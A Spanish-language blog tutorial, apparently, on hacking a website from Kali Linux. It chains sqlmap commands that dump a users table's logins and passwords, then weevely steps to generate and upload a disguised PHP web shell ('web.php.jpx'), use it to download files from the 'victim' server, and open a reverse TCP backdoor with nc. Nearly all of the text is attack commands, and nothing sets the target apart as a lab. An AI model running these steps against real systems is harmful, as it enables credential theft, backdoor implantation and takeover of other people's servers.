Kali linux hackear una pagina web y manipularla desde kali linux 馃悶




1.- Vamos a obtener la bd
sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs
Esto nos debe de regresar algo asi


2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables
Este es el resultado


3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns
Este es el resultado:



4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump
Listo hemos obtenido el usuario y password.




2.- Una vez obtenida el usuario y contrase帽a procedemos a instalar la herramienta PySocks la cual nos ayudara a iniciar la conexi贸n entre nustra maquina y la pagina victima.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
Nos salimos de la carpeta
cd ..
3.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima
Descargamos y entramos a weevely
git clone https://github.com/epinna/weevely3.git 
cd weevely3
Creamos un archivo tunel llamado web.php.jpx
python weevely.py generate hacked /root/Escritorio/web.php.jpx
Donde:
/root/Escritorio/ : es la carpeta donde colocaremos nuestro archivo

En caso de que el anterior comando de errores quizas falta instalar dependencias como se muestra aqui



Subimos el archivo web.php.jpx a la pagina victima

Nos conectamos al archivo desde nuestra maquina local
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
Ya estamos en la maquina de la pagina victima y podemos hacer lo que querramos por ejemplo descargar un archivo.
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png
Para mayor comodidad podemos crear un TCP reverse backdoor asi:
nc -l -p 5412
:backdoor_reversetcp 192.168.8.103 5412
Donde
192.168.8.103 La ip de nustro kali




































Comentarios

Facebook Like

Entri Populer

hackear wifi con kali linux 馃摗

Instalar Netbeans 10 en Windows 10

Instalar netbeans 10 en ubuntu 18.04